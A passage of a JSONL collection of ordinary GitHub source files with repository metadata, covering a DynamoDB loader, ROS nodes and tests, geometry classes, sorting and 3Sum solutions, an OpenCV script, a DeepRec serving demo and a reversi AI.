+{"seq_id":"73837488407","text":"import json\nimport boto3\nfrom pprint import pprint\n\ndynamodb = boto3.resource('dynamodb', region_name='us-east-1', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\ntable = dynamodb.Table('courses')\n\n#sample data\n\"\"\"\n{\n \"title\": \"Java fundamentals\",\n \"desc\": \"Learning java\",\n \"courseid\": \"ENSF607\"\n}\n\"\"\"\n\nwith open('input_data.json') as json_file:\n courses = json.load(json_file)\n for course in courses:\n courseid = course['courseid']\n desc = course['desc']\n title = course['title']\n \n response = table.put_item(\n Item = {\n 'courseid':courseid,\n 'desc':desc,\n 'title':title,\n }\n )\n print(\"Put item succeeded\")\n print(json.dumps(response, indent=4))","repo_name":"soumoks/aws-workshop","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"13470337157","text":"#!/usr/bin/env python\nfrom __future__ import print_function, division\nimport sys\nimport random\nfrom abstractclass_unittest_dyadic import Abstractclass_Unittest_Dyadic\n\n\nclass ArgProbD_Test(Abstractclass_Unittest_Dyadic):\n def __init__(self, *args):\n super(ArgProbD_Test, self).__init__(*args)\n self._unique_id = \"argprobd\"\n self.__params = {\"qsr_relations_and_values\": {\"close\": (10, 10/2), \"near\": (20, 20/2),\n \"far\": (30, 30/2), \"veryfar\": (40, 40/2)}}\n self.__seed = 100\n\n def test_defaults(self):\n # with bounding boxes\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data2\", \"data2_argprobd_defaults.txt\", {self._unique_id: self.__params}))\n # without bounding boxes\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data3\", \"data3_argprobd_defaults.txt\", {self._unique_id: self.__params}))\n # floats\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data4\", \"data4_argprobd_defaults.txt\", {self._unique_id: self.__params}))\n\n def test_qsrs_for_global_namespace(self):\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data2\", \"data2_argprobd_qsrs_for_global_namespace.txt\",\n {\"for_all_qsrs\": {\"qsrs_for\": [(\"o2\", \"o1\")]}, self._unique_id: self.__params}))\n\n def test_qsrs_for_qsr_namespace(self):\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data2\", \"data2_argprobd_qsrs_for_qsr_namespace.txt\",\n {self._unique_id: {\"qsrs_for\": [(\"o1\", \"o2\")],\n \"qsr_relations_and_values\": self.__params[\"qsr_relations_and_values\"]}}))\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data2\", \"data2_argprobd_qsrs_for_qsr_namespace.txt\",\n {\"for_all_qsrs\": {\"qsrs_for\": [(\"o2\", \"o1\")]},\n self._unique_id: {\"qsrs_for\": [(\"o1\", \"o2\")],\n \"qsr_relations_and_values\": self.__params[\"qsr_relations_and_values\"]}}))\n\n\nif __name__ == '__main__':\n import rosunit\n rosunit.unitrun(\"qsr_lib\", \"argprobd_test\", ArgProbD_Test, sys.argv)\n","repo_name":"strands-project/strands_qsr_lib","sub_path":"qsr_lib/tests/argprobd_tester.py","file_name":"argprobd_tester.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"43715029270","text":"from setuptools import setup, find_packages\nimport os.path as path\n\nlong_desc = open(path.join(path.dirname(__file__), \"README.md\")).read()\n\nsetup(\n name=\"football-table\",\n version=\"0.0.1\",\n author=\"Dan Walters\",\n author_email=\"dan.walters5@outlook.com\",\n description=\"A CLI to do football tables\",\n url=\"https://github.com/dwdwdan/football-table\",\n package_dir={\"\": \"src\"},\n packages=find_packages(where=\"src\"),\n python_requires=\">=3.6\",\n install_requires=[],\n entry_points={\n \"console_scripts\": [\n \"football-table=football_table.cli:main\",\n ]\n },\n long_description=long_desc,\n long_description_content_type=\"text/markdown\",\n)\n","repo_name":"dwdwdan/football-table","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31167508221","text":"import sys\r\n\r\nsys.path.append('..')\r\n\r\nfrom src.Element import Element\r\n\r\nclass Wall(Element):\r\n \"\"\"\r\n A class to represent a wall.\r\n ...\r\n \r\n Parameters\r\n ----------\r\n coordinates : Tuple of Coordiante\r\n The coordinate of the wall\r\n\r\n Attributes\r\n ----------\r\n listWindow : List\r\n The list of window on the wall\r\n listDoor : List\r\n The list of door on the wall\r\n listCanBeContain: List\r\n The list of list of 2 coordinates where we can add a new element\r\n vector: Numpy Array\r\n The vector of coordinates\r\n\r\n Methods\r\n -------\r\n getVector():\r\n Get the attribute vector \r\n getListCanBeContain():\r\n Get the attribute listCanBeContain\r\n getLength(coordinate):\r\n Return the length of two coordinate\r\n listContainAfterAddingElement(element):\r\n Return true if we can add the element on the wall and add it, false else\r\n canBeContain(selfcoordinate,elem):\r\n Return true if the coordiante of elem are on the sequence of selfcoordinate\r\n addWindow(window):\r\n Add window if possible\r\n addDoor(door):\r\n Add door if possible\r\n getListWindow():\r\n Get the list of window \r\n getListDoor():\r\n Get the list of door\r\n \"\"\"\r\n def __init__(self,coordinates):\r\n super().__init__(coordinates)\r\n self.__listWindow = []\r\n self.__listDoor=[]\r\n self.__listCanBeContain=[[self.getCoordinates()[0],self.getCoordinates()[1]]]\r\n self.__vector=self.getCoordinates()[0].getVector(self.getCoordinates()[1]) #vecteur associé au mur\r\n\r\n \r\n def getVector(self):\r\n '''\r\n Returns\r\n -------\r\n TYPE Numpy Array\r\n Get the vector of the coordiantes\r\n '''\r\n return self.__vector\r\n \r\n def getListCanBeContain(self):\r\n '''\r\n Returns\r\n -------\r\n TYPE List\r\n Get the list of list of 2 coordinates where can we add a window or door\r\n '''\r\n return self.__listCanBeContain\r\n \r\n \r\n def listContainAfterAddingElement(self,element):\r\n '''\r\n Parameters\r\n ----------\r\n element : Element(window or door)\r\n The element that we hope add on the wall\r\n\r\n Returns\r\n -------\r\n found : Boolean\r\n Return true if we can add element to the wall, false else\r\n '''\r\n found = False\r\n for i in range(len(self.__listCanBeContain)):\r\n if self.canBeContain(self.__listCanBeContain[i], element):\r\n found = True\r\n if element.getCoordinates()[0] == self.__listCanBeContain[i][0]:\r\n if element.getCoordinates()[1] != self.__listCanBeContain[i][1]:\r\n self.__listCanBeContain[i][0]=element.getCoordinates()[1]\r\n else:\r\n self.__listContain.remove(self.__listCanBeContain[i])\r\n elif element.getCoordinates()[1] == self.__listCanBeContain[i][1]:\r\n self.__listCanBeContain[i][1]=element.getCoordinates()[0]\r\n else:\r\n self.__listCanBeContain.append([element.getCoordinates()[1],self.__listCanBeContain[i][1]])\r\n self.__listCanBeContain[i][1]=element.getCoordinates()[0]\r\n return found\r\n return found\r\n \r\n def canBeContain(self,selfcoordinate,element):\r\n '''\r\n Parameters\r\n ----------\r\n selfcoordinate : List\r\n The list of 2 coordinate where we try to add element\r\n element : Element\r\n The element that we hope add\r\n\r\n Returns\r\n -------\r\n TYPE Boolean\r\n Return True if the coordinates of element are in the sequence of the coordinates of selfelem\r\n '''\r\n isAfter1 = selfcoordinate[0].isAfter(element.getCoordinates()[0])\r\n isBefore1 = element.getCoordinates()[1].isAfter(selfcoordinate[1])\r\n isAfter2 = selfcoordinate[0].isAfter(element.getCoordinates()[1])\r\n isBefore2 = element.getCoordinates()[0].isAfter(selfcoordinate[1])\r\n onTheLine1 = selfcoordinate[0].onTheLine(selfcoordinate[1],element.getCoordinates()[0])\r\n onTheLine2 = selfcoordinate[0].onTheLine(selfcoordinate[1],element.getCoordinates()[1])\r\n return isAfter1 and isBefore1 and onTheLine1 and onTheLine2 and isAfter2 and isBefore2\r\n \r\n def addWindow(self,window):\r\n '''\r\n Parameters\r\n ----------\r\n window : Window\r\n The window that we hope add on the wall\r\n\r\n Returns\r\n -------\r\n None. (add window on the wall if possible)\r\n\r\n '''\r\n if (window not in self.__listWindow) and (self.listContainAfterAddingElement(window)):\r\n self.__listWindow.append(window)\r\n \r\n def addDoor(self,door):\r\n '''\r\n Parameters\r\n ----------\r\n door : Door\r\n The door that we hope add on the wall\r\n\r\n Returns\r\n -------\r\n None. (add door on the wall if possible)\r\n\r\n '''\r\n if (door not in self.__listDoor) and (self.listContainAfterAddingElement(door)):\r\n self.__listDoor.append(door)\r\n \r\n def getListWindow(self):\r\n '''\r\n Returns\r\n -------\r\n TYPE List\r\n The list of window on the wall\r\n '''\r\n return self.__listWindow\r\n \r\n def getListDoor(self):\r\n '''\r\n Returns\r\n -------\r\n TYPE List\r\n The list of door on the wall\r\n '''\r\n return self.__listDoor\r\n","repo_name":"yassinhc/Building_digital","sub_path":"src/Wall.py","file_name":"Wall.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1002130497","text":"#!/usr/bin/env python\n# license removed for brevity\n\"\"\"\nTest ROS Node to chatter and produce values we want for testing. Currently setup to give us desired encoder positions.\n\n@author Shashank Swaminathan\n\"\"\"\nimport rospy\nfrom std_msgs.msg import String\nimport numpy as np\n\nclass Johnny:\n def __init__(self, r):\n self.john = [0,0,0,0,0,0]\n # self.pub_d = rospy.Publisher('/des_pos/robot1', String, queue_size=10)\n self.pub_d = rospy.Publisher('/motor_ctrls/robot1', String, queue_size=10)\n # self.pub_e = rospy.Publisher('/encoder_data/robot1', String, queue_size=10)\n # rospy.Subscriber(\"/curr_pos/robot1\", String, self.cb)\n rospy.init_node('talker', anonymous=True)\n self.rate = rospy.Rate(r) # 10hz\n def run(self, k):\n # posx=np.cos(np.linspace(0,2*np.pi,100))*k\n # posy=np.sin(np.linspace(0,2*np.pi,100))*k\n # counter=x=y=0\n while not rospy.is_shutdown():\n # time=rospy.get_time()\n # if self.john[5] != 1:\n # x=0\n # y=0\n # else:\n # x=posx[counter]\n # y=posy[counter]\n # counter = (counter + 1) % 100\n\n # # epos = ','.join(list(map(str,[x,y,time])))\n dpos = ','.join(list(map(str,[100,100,0])))\n rospy.loginfo(dpos)\n # self.pub_e.publish(epos)\n self.pub_d.publish(dpos)\n self.rate.sleep()\n\n def cb(self, msg):\n self.john = list(map(float, msg.data.split(',')))\n\nif __name__ == '__main__':\n try:\n johnny = Johnny(0.7)\n johnny.run(4)\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Kristtiya/POE_Inkscape","sub_path":"inkscape_ws/src/test_foo/src/talker.py","file_name":"talker.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32324412485","text":"# 3Sum\n# Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]]\n# such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.\n# Notice that the solution set must not contain duplicate triplets.\n# Scott 2021/07/30\nclass Solution:\n\n # Original\n # Relatively Efficient 60.53%\n # Double index with sorted list\n def threeSum(self, nums: list[int]) -> list[list[int]]:\n length = len(nums)\n if length < 3:\n return []\n nums.sort()\n result = []\n for index in range(length):\n if index and nums[index] == nums[index - 1]:\n continue\n i = index + 1\n j = length - 1\n while i < j:\n sum = nums[index] + nums[i] + nums[j]\n if sum == 0:\n result.append([nums[index], nums[i], nums[j]])\n # Move both left and right pointers\n i += 1\n # If current value is still equal to the previous one, continue increasing\n while (i < j and nums[i] == nums[i - 1]):\n i += 1\n j -= 1\n while (i < j and nums[j] == nums[j + 1]):\n j -= 1\n elif sum > 0:\n j -= 1\n elif sum < 0:\n i += 1\n return result\n\n\nif __name__ == \"__main__\":\n print(Solution().threeSum([-1, 0, 1, 2, -1, -4]),\n [[-1, -1, 2], [-1, 0, 1]])\n print(Solution().threeSum([]), [])\n print(Solution().threeSum([0]), [])\n","repo_name":"ScottCTD/Programming-Practices","sub_path":"LeetCode/python/Q15.py","file_name":"Q15.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74890633686","text":"import os\nimport subprocess\n\n\ndef exportImage(filename, fig=None, type=\"pgf\", **kwargs):\n ''' Export a Matplotlib figure to file\n\t\ttype: Defines the type of the exported figure\n\t\t\t - \"pgf\":exports the pgf with the corresponding pdf\n\t\t\t - \"all\": does both\n\t'''\n\n # remove filename ending\n file = os.path.basename(filename)\n dir = os.path.dirname(filename)\n filename = os.path.join(dir, os.path.splitext(file)[0])\n\n if type == \"pgf\" or type == \"all\":\n fig.savefig(filename + \".pdf\", **kwargs)\n fig.savefig(filename + \".pgf\", **kwargs)\n\n if type == \"emf\" or type == \"all\":\n fig.savefig(filename + \".svg\", **kwargs)\n\n if type == \"png\":\n fig.savefig(filename + \".png\", **kwargs)\n\n\n\ndef convertToEmf(filename):\n dummy_ending = \".pdf\"\n dummy_export_param = \"--export-pdf\"\n\n emf_ending = \".emf\"\n emf_export_param = \"--export-emf\"\n\n # remove filename ending\n file = os.path.basename(filename)\n dir = os.path.dirname(filename)\n filename_emf = os.path.splitext(file)[0] + \"_converted\" + dummy_ending\n cmd = \"inkscape\" + \" \" + file + \" \" + dummy_export_param+\"=\"+filename_emf\n os.chdir(dir)\n os.listdir()\n output = subprocess.call(cmd, shell=True)\n print(output)\n\n\n\nif __name__ == \"__main__\":\n convertToEmf(\"/home/bernhard/development/jb_git/Programming/IV2018/programming/NNPlanner/results_paper/figures/parking_scenarios_0.svg\")\n\n\n\n\n\n","repo_name":"juloberno/diadem","sub_path":"diadem/experiment/evaluation/export/export_image.py","file_name":"export_image.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26352055830","text":"import cv2\nimport numpy as np\nimport copy\nimport glob\n\nimages = glob.glob('*.jpg')\n\nfor im in images:\n img = cv2.imread(im)\n\n cimg = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n img2 = cv2.medianBlur(cimg,13)\n\n ret,thresh1 = cv2.threshold(cimg,100,120,cv2.THRESH_BINARY)\n t2 = copy.copy(thresh1)\n th3 = cv2.adaptiveThreshold(img2,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv2.THRESH_BINARY,11,2)\n image, contours, hierarchy = cv2.findContours(t2,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n #cv2.drawContours(img, contours, -1, (0,255,0), 3)\n\n for i in xrange(len(contours)):\n cnt = contours[i]\n if cv2.contourArea(cnt) > 1000 and cv2.contourArea(cnt) < 15000:\n cv2.drawContours(img, [cnt],-1, [255, 255, 255])\n '''\n if cv2.contourArea(cnt) > 0 and cv2.contourArea(cnt) < 10000000:\n hull = cv2.convexHull(cnt,returnPoints = False)\n defects = cv2.convexityDefects(cnt,hull)\n\n for i in range(defects.shape[0]):\n s,e,f,d = defects[i,0]\n start = tuple(cnt[s][0])\n end = tuple(cnt[e][0])\n cv2.line(img,start,end,[0,255,0],1)\n '''\n\n cv2.imshow('image',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"vampcoder/A-star-planning","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"34587531096","text":"def merge_sort(lis):\n l = len(lis)\n if l <= 1:\n return lis\n left_len = l/2\n left, right = merge_sort(lis[:left_len]), merge_sort(lis[left_len:])\n return merge(left, right)\n\ndef merge(left, right):\n left_len, right_len = len(left), len(right)\n to_return = []\n l, r = 0, 0\n while l < left_len and r < right_len:\n left_, right_ = left[l], right[r]\n if left_ < right_:\n to_return.append(left_)\n l += 1\n else:\n to_return.append(right_)\n r += 1\n to_add = right[r:] or left[l:]\n to_return += to_add\n return to_return\n\nimport random\nlis = range(1000000)\nrandom.shuffle(lis)\nmerge_sort(lis)\n","repo_name":"thisiswei/random-learning","sub_path":"algorithm/wee1k.py","file_name":"wee1k.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"6007873493","text":"import time\nimport math as m\nimport numpy as np\nfrom collections import Counter\nimport copy\nfrom bitarray import bitarray\nfrom bitarray import util as btutil\nimport argparse\nfrom zobrist import ZobristTable\nfrom problem64 import Color, Move, Board, Stack\n\nclass Game:\n def __init__(self):\n self.initialize_game()\n \n def initialize_game(self):\n self.board = Board(0,0)\n self.board[27] = Color.BLACK\n self.board[36] = Color.BLACK\n self.board[28] = Color.WHITE\n self.board[35] = Color.WHITE\n\n self.shallow_depth = 4 #default for shallow depth move ordering\n self.counter = self.board.count()\n self.pruned = 0\n self.evals = 0\n self.symm = 0\n self.moves = 0\n self.current_player = Color.BLACK\n self.flipstack = Stack(3000)\n self.zobrist = ZobristTable()\n self.zobrist.calc_keys()\n self.current_hash = self.zobrist.hash_board(self.board)\n \n structure = np.array([[16, -4, 4, 2, 2, 4, -4, 16],\n [-4, -12, -2, -2 ,-2, -2, -12,-4],\n [4, -2, 4, 2, 2, 4, -2, 4],\n [2, -2, 2, 0, 0, 2, -2, 2],\n [2, -2, 2, 0, 0, 2, -2, 2],\n [4, -2, 4, 2, 2, 4, -2, 4],\n [-4, -12, -2, -2 ,-2, -2, -12,-4],\n [16, -4, 4, 2, 2, 4, -4, 16]]).flatten()\n \n\n #TODO: Implement actual test\n def move_valid(self, move, player):\n if self.board[move.y*8+move.x] != Color.NONE:\n return False\n return True\n\n def count(self):\n return self.board.count()\n \n\n def draw_board(self):\n print(self.board)\n\n def scan_move(self, i, j, player):\n retval = []\n for yinc in range(-1,2):\n for xinc in range(-1,2):\n if xinc == 0 and yinc == 0:\n continue\n x = j\n y = i\n\n nmoves = 0\n\n while True:\n x += xinc\n y += yinc\n if x>=0 and y>=0 and x<=7 and y<=7:\n if self.board[y*8+x] == -player:\n nmoves += 1\n else:\n break\n else:\n nmoves = 0\n break\n\n if nmoves > 0 and self.board[y*8+x] == Color.NONE:\n if x < 0 or y < 0:\n print(\"boink\")\n else:\n retval.append(Move(x,y))\n\n return retval\n \n #TODO: this function is too slow\n def next_moves(self,player):\n next_moves = []\n\n if self.board.outside_square() == False:\n rmin = 1\n rmax = 7\n else:\n rmin = 0\n rmax = 8\n \n for i in range(rmin,rmax):\n for j in range(rmin,rmax):\n if self.board[i*8+j] == player:\n m = self.scan_move(i,j,player)\n next_moves += m\n used = set()\n unique = [x for x in next_moves if x not in used and (used.add(x) or True)]\n return unique\n\n def make_move(self,player,move):\n flipped = 0\n i = move.y\n j = move.x\n\n self.board[i*8+j] = player\n self.current_hash ^= int(self.zobrist.key_table[i*8+j][player])\n\n for yinc in range(-1,2):\n for xinc in range(-1,2):\n if xinc == 0 and yinc ==0:\n continue\n y = i\n x = j\n nmoves = 0\n\n while True:\n x += xinc\n y += yinc\n if x>=0 and y>=0 and x<=7 and y<=7:\n if self.board[y*8+x] == -player:\n nmoves += 1\n else:\n break\n else:\n nmoves = 0\n break\n\n if nmoves > 0 and self.board[y*8+x] == player:\n x -= xinc\n y -= yinc\n while self.board[y*8+x] == -player:\n self.flipstack.push(y,x)\n flipped += 1\n self.board.flip(y*8+x)\n x -= xinc\n y -= yinc\n self.counter[player] += flipped + 1\n self.counter[-player] -= flipped\n\n self.moves += 1\n return flipped\n \n def undo_move(self,move,flipped):\n i = move.y\n j = move.x\n\n player = self.board[i*8+j]\n self.counter[player] -= flipped + 1\n self.counter[-player] += flipped\n self.board[i*8+j] = Color.NONE\n self.current_hash ^= int(self.zobrist.key_table[i*8+j][player]) #TODO: zobrist.get_key()\n\n for i in range(0,flipped):\n (y,x) = self.flipstack.pop()\n self.board.flip(y*8+x)\n \n def eval_structure(self,c):\n structure_sum = 0\n outside_square = self.board.outside_square()\n mult = 1\n\n if outside_square:\n b = self.board.copy()\n b.wstate &= ~b.square_mask\n b.bstate &= ~b.square_mask\n mult = 3\n else:\n b = self.board\n\n \n x = btutil.int2ba(b.wstate,length=64)\n y = btutil.int2ba(b.bstate,length=64)\n \n structure_sum = np.matmul(y.tolist(),self.structure)\n structure_sum -= np.matmul(x.tolist(),self.structure)\n\n\n structure_sum *= mult*c\n return structure_sum\n\n def eval(self):\n self.evals += 1\n\n omoves = self.next_moves(-self.current_player)\n moves = self.next_moves(self.current_player)\n\n M = (len(moves)-len(omoves))*2\n S = self.eval_structure(self.current_player)\n A = self.counter[self.current_player] - self.counter[-self.current_player]\n \n n = self.counter[Color.WHITE]+self.counter[Color.BLACK]\n z = 0.035\n W = m.exp(-n*z)\n\n score = (M+S)*W + A*(1-W)\n return score\n \n def sort_initial_moves(self,moves):\n sorted_moves = []\n alpha = -m.inf\n beta = m.inf\n max_value = alpha\n value = 0\n for mov in moves:\n s = self.make_move(self.current_player,mov)\n value = self.alphabeta_min(self.shallow_depth-1,max_value,beta)\n self.undo_move(mov,s)\n sorted_moves.append((value,mov))\n sorted_moves.sort(reverse=True)\n return sorted_moves\n\n def alphabeta_init(self,depth):\n moves = self.next_moves(self.current_player)\n if len(moves) == 1:\n return moves[0]\n\n retmov = None\n alpha = -m.inf\n beta = m.inf\n max_value = alpha\n value = 0\n sorted_moves = self.sort_initial_moves(moves)\n for item in sorted_moves:\n mov = item[1]\n s = self.make_move(self.current_player,mov)\n value = self.alphabeta_min(depth-1,max_value,beta)\n self.undo_move(mov,s)\n if value > max_value:\n max_value = value\n retmov = mov\n if max_value >= beta:\n self.pruned += 1\n break\n #samesies but use the alphabetically lower version\n if value == max_value and mov and mov < retmov:\n retmov = mov\n return (value,retmov)\n\n def alphabeta_max(self, depth, alpha, beta):\n moves = self.next_moves(self.current_player)\n\n if len(moves) == 0 or depth == 0:\n return self.eval()\n \n max_value = alpha\n for mov in moves:\n s = self.make_move(self.current_player,mov)\n value = self.alphabeta_min(depth-1,max_value,beta)\n self.undo_move(mov,s)\n if value > max_value:\n max_value = value\n if max_value >= beta:\n self.pruned += 1\n break \n return max_value\n \n def alphabeta_min(self, depth, alpha, beta):\n moves = self.next_moves(-self.current_player)\n if len(moves) == 0 or depth == 0:\n return self.eval()\n\n min_value = beta\n for mov in moves:\n s = self.make_move(-self.current_player,mov)\n value = self.alphabeta_max(depth-1,alpha,min_value)\n self.undo_move(mov,s)\n if value < min_value:\n min_value = value\n if min_value <= alpha:\n self.pruned += 1\n break\n return min_value\n\ndef test_symmetry():\n b = Board(0,0)\n b[27] = Color.BLACK\n b[28] = Color.BLACK\n b[63] = Color.WHITE\n b[56] = Color.WHITE\n #b[62] = Color.WHITE\n #b[56] = Color.WHITE\n #b = g.game_state.copy()\n #print(\"x symmetry\")\n #print(b)\n assert(b.wstate == b.bit_reverse_8(b.wstate))\n assert(b.bstate == b.bit_reverse_8(b.bstate))\n b = Board(0,0)\n b[0] = Color.WHITE\n b[56] = Color.WHITE\n #print(\"y symmetry\")\n #print (b)\n assert(b.wstate == b.flip_vertically(b.wstate))\n assert(b.bstate == b.flip_vertically(b.bstate))\n #print(b)\n b = Game().board\n #print(\"180 degree rotation\")\n #print (b)\n assert(b.wstate == b.bit_reverse_64(b.wstate))\n assert(b.bstate == b.bit_reverse_64(b.bstate))\n print(\"Symmetry test successful.\")\n\ndef test_eval():\n g = Game()\n assert(g.eval() == 0)\n b = g.board\n b[2*8+5] = Color.WHITE\n b[3*8+5] = Color.BLACK\n b[4*8+2] = Color.BLACK\n b[5*8+2] = Color.WHITE\n assert(g.eval_structure(Color.WHITE) == 4)\n assert(g.eval_structure(Color.BLACK) == -4)\n b[0] = Color.BLACK\n assert(g.eval_structure(Color.BLACK)==48)\n assert(g.eval_structure(Color.WHITE)==-48)\n g = Game()\n assert(len(g.next_moves(Color.BLACK))==4)\n g.make_move(Color.BLACK,Move(4,2))\n np.testing.assert_almost_equal(g.eval(),2.160542979230793)\n print(\"Evaluation Test successful\")\n\n\n\n \n \ndef main():\n parser = argparse.ArgumentParser(description='CLI based reversi game with AI player')\n parser.add_argument('--test', action='store_true')\n parser.add_argument('-v','--verbose', action='store_true')\n\n args = parser.parse_args()\n if args.test:\n test_symmetry()\n test_eval()\n else:\n run()\n \n \n\n\ndef run():\n g = Game()\n b = g.board\n b[2*8+5] = Color.WHITE\n b[3*8+5] = Color.BLACK\n b[4*8+2] = Color.BLACK\n b[5*8+2] = Color.WHITE\n print(b)\n g.zobrist.load_from_file('zobrist.npz')\n hashed_board = g.zobrist.hash_board(b)\n g.current_hash = hashed_board\n \n\n g.shallow_depth = 4\n depth = 7\n\n passing = 0\n moves = []\n\n passing = 0\n\n while True:\n try:\n cev = g.evals\n cmv = g.moves\n cpr = g.pruned\n sym = g.symm\n t1 = time.time()\n \n (value,mv) = g.alphabeta_init(depth)\n\n t1 = time.time() - t1\n print(\"Time: {}s\".format(t1))\n cev = g.evals - cev\n cmv = g.moves - cmv\n cpr = g.pruned - cpr\n sym = g.symm - sym\n print(\"Evals: {} Evals/s: {} Moves: {} Pruned: {} Symmetry: {}\".format(cev,cev/t1,cmv,cpr,sym))\n\n if mv != None:\n g.make_move(g.current_player,mv)\n moves.append(mv)\n g.draw_board()\n print(\"Color: {} Move: {} Value: {:0.9f}\".format(Color.format(g.current_player),mv,value))\n passing = 0\n else:\n passing += 1\n print(\"Color: {}\".format(Color.format(g.current_player)))\n if passing == 2:\n break\n\n g.current_player = -g.current_player\n except KeyboardInterrupt:\n #g.zobrist.save_to_file('zobrist.npz')\n break\n except: #make crashes traceable\n for mov in moves:\n print(mov,end=\"\")\n print()\n print(b.wstate)\n print(b.bstate)\n \n c = g.count()\n if c[Color.WHITE] > c[Color.BLACK]:\n print(\"WHITE won!\")\n else:\n print(\"BLACK won!\")\n\n for mov in moves:\n print(mov,end=\"\")\n print()\n\nif __name__ == \"__main__\":\n main()","repo_name":"roggenbrot42/problem64","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":12391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36849562852","text":"import sys\nimport ctypes\n\nfrom predict_pb2 import (\n ArrayDataType,\n ArrayShape,\n ArrayProto,\n PredictRequest,\n PredictResponse,\n)\n\nmodel_config = '{ \\\n \"omp_num_threads\": 4, \\\n \"kmp_blocktime\": 0, \\\n \"feature_store_type\": \"memory\", \\\n \"serialize_protocol\": \"protobuf\", \\\n \"inter_op_parallelism_threads\": 10, \\\n \"intra_op_parallelism_threads\": 10, \\\n \"init_timeout_minutes\": 1, \\\n \"signature_name\": \"serving_default\", \\\n \"read_thread_num\": 3, \\\n \"update_thread_num\": 2, \\\n \"model_store_type\": \"local\", \\\n \"checkpoint_dir\": \"/tmp/checkpoint/\", \\\n \"savedmodel_dir\": \"/tmp/saved_model/\" \\\n}'\n\nif __name__ == \"__main__\":\n # Load shared library\n processor = ctypes.cdll.LoadLibrary(\"libserving_processor.so\")\n model_entry = \"\"\n state = ctypes.c_int(0)\n state_ptr = ctypes.pointer(state)\n processor.initialize.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_void_p]\n processor.initialize.restype = ctypes.POINTER(ctypes.c_char)\n model = processor.initialize(\n ctypes.create_string_buffer(model_entry.encode(\"utf-8\")),\n ctypes.create_string_buffer(model_config.encode(\"utf-8\")),\n state_ptr,\n )\n if state_ptr.contents == -1:\n print(\"initialize error\", file=sys.stderr)\n\n # input type: float\n dtype = ArrayDataType.Value(\"DT_FLOAT\")\n # input shape: [1, 1]\n array_shape = ArrayShape()\n array_shape.dim.append(1)\n array_shape.dim.append(1)\n # input array\n input = ArrayProto()\n input.float_val.append(1.0)\n input.dtype = dtype\n input.array_shape.CopyFrom(array_shape)\n # PredictRequest\n req = PredictRequest()\n req.signature_name = \"serving_default\"\n req.output_filter.append(\"y:0\")\n req.inputs[\"x:0\"].CopyFrom(input)\n buffer = req.SerializeToString()\n size = req.ByteSize()\n\n # do process\n output = ctypes.c_void_p(0)\n output_ptr = ctypes.pointer(output)\n output_size = ctypes.c_int(0)\n output_size_ptr = ctypes.pointer(output_size)\n processor.process.argtypes = [\n ctypes.c_void_p,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.POINTER(ctypes.c_void_p),\n ctypes.c_void_p,\n ]\n processor.process.restype = ctypes.c_int\n state = processor.process(model, buffer, size, output_ptr, output_size_ptr)\n\n # parse response\n output_string = ctypes.string_at(output, output_size)\n resp = PredictResponse()\n resp.ParseFromString(output_string)\n print(f\"process returned state: {state}, response: {dict(resp.outputs.items())}\")\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"serving/sdk/python/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} +{"seq_id":"71876461207","text":"import os\nimport csv\nimport pycorels\nimport numpy as np\n\nbase_all_out_file = \"data/all.out\"\nexpanded_all_out_file = \"data/expanded.out\"\ntrain_out_file = \"data/train.out\"\ntest_out_file = \"data/test.out\"\n#eout_file = data_dir + \"expanded.out\"\n\ntrain_dir = \"data/train/\"\ntest_dir = \"data/test/\"\ncsv_dir = \"data/clean_csv/\"\n\nmin_accuracy = 0.95\n\nverbosity = \"log,silent\"\n\nmaxnodes = [100, 1000, 10000, 100000, 1000000]\ncardinality = 2\nmin_support = 0.001\nc = 0.01\ngates = 2\nmap_type = 0\n\ntrain_test_split = 120\n\ngenerate_bits = [1, 18, 286, 352, 420]\n\n\ndef csplit(rules, indices):\n\n indices_or_sections = []\n out = []\n numsections = 0\n\n if not isinstance(indices, list):\n nsamples = 